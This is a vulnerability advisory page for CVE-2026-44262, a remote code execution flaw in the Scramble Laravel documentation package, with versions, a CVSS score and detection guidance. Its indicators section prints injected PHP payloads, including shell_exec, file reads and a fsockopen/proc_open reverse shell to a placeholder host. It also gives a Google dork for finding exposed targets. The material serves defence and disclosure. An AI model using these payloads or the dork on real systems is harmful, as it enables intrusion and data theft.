cbcvebase.
CVE-2026-44262
published 2026-05-12

CVE-2026-44262: Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation…

PriorityP276critical9.4CVSS 3.1
AVNACLPRNUINSUCHIHAL
EXPLOIT
EPSS
5.86%
92.3th percentile
Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.

Affected

2 ranges
VendorProductVersion rangeFixed in
dedocscramble
dedocscramble>= 0.13.2 < 0.13.220.13.22

Detection & IOCsextracted from sources · hover to see the quote

url/docs/api.json
path/docs/api.json
commandsleep({SLEEP_SECONDS})
commandprint(shell_exec("id 2>&1"))
commandprint(php_uname('s'))
commandprint(file_get_contents({path}))
command$s=@fsockopen('{lhost}',{lport},$e,$m,30);if(!$s)return;$p=proc_open({shell},array(0=>$s,1=>$s,2=>$s),$pipes);if($p)proc_close($p);fclose($s);
  • Monitor HTTP requests to /docs/api.json containing PHP function names in query parameters (sleep, shell_exec, print, file_get_contents, fsockopen, proc_open) — these are injected as Laravel validation rule defaults to trigger RCE.
  • Exploit identifies vulnerable parameters by checking OpenAPI spec query parameter 'default' values that match Laravel validation rule keywords or contain '|' — defenders should audit /docs/api.json schema defaults for user-controlled input reflected as validation rules.
  • The exploit checks for a 200 HTTP response and presence of '"paths"' in the body to confirm the docs endpoint is publicly accessible — alert on unauthenticated access to /docs/api.json returning 200 with JSON body containing 'paths'.
  • Timing-based detection: exploit sends a sleep() payload and measures response delay >= 75% of the sleep duration as confirmation of RCE — monitor for anomalously slow responses on /docs/api.json.
  • Exploit output capture works by reading content appearing before the first '{' character in the JSON response body — PHP print/echo output from injected code leaks before the JSON structure begins.
  • Google dork for exposed vulnerable instances: inurl:/docs/api.json "dedoc/scramble"
  • ·The vulnerability only exists when the /docs/api.json endpoint is publicly accessible (unauthenticated). Restricting access via middleware eliminates the attack surface without patching.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.